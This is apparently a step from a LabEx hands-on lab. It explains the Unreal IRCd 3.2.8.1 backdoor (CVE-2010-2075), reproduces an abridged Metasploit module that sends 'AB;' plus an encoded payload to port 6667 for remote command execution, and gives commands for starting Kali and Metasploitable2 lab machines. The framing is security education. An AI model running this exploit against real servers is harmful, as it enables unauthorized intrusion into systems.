Understand the Unreal IRCd Vulnerability and Start the Experiment Environment
The Unreal IRCd 3.2.8.1 version contains a backdoor vulnerability (CVE-2010-2075) that allows remote attackers to execute arbitrary code on the affected system. The vulnerability exists in the DEBUG3_DOLOG_SYSTEM
macro, which includes external malicious code that can be leveraged by an attacker.
Relevant information:
The Metasploit module for exploiting this vulnerability:
Here's a brief overview of the Metasploit module:
## Require necessary modules
require 'msf/core'
## Define the Metasploit module class
class MetasploitModule < Msf::Exploit::Remote
## Module initialization with details like name, description, author, references, etc.
def initialize(info = {})
super(update_info(info,
'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
'Description' => %q{
This module exploits a malicious backdoor that was added to the
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
},
## ... (omitted for brevity)
))
## Set default options
register_options(
[
Opt::RPORT(6667)
], self.class)
end
## Exploit method
def exploit
## Connect to the remote service
connect
## Print banner information
print_status("Connected to #{rhost}:#{rport}...")
banner = sock.get_once(-1, 30)
banner.to_s.split("\n").each do |line|
print_line(" #{line}")
end
## Send the backdoor command
print_status("Sending backdoor command...")
sock.put("AB;" + payload.encoded + "\n")
## Wait for session creation or timeout
1.upto(120) do
break if session_created?
select(nil, nil, nil, 0.25)
handler()
end
disconnect
end
end
Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.
- Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
- Test the connectivity to the target machine by pinging it:
ping 192.168.122.102
Press Ctrl+C
to stop the ping.
- Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
- Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102
Press Ctrl+C
to stop the ping.
Now both the attack machine and the target machine are running, and you can start the penetration testing.
Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash
again on the host to start a new Kali container and enter bash to continue the experiment.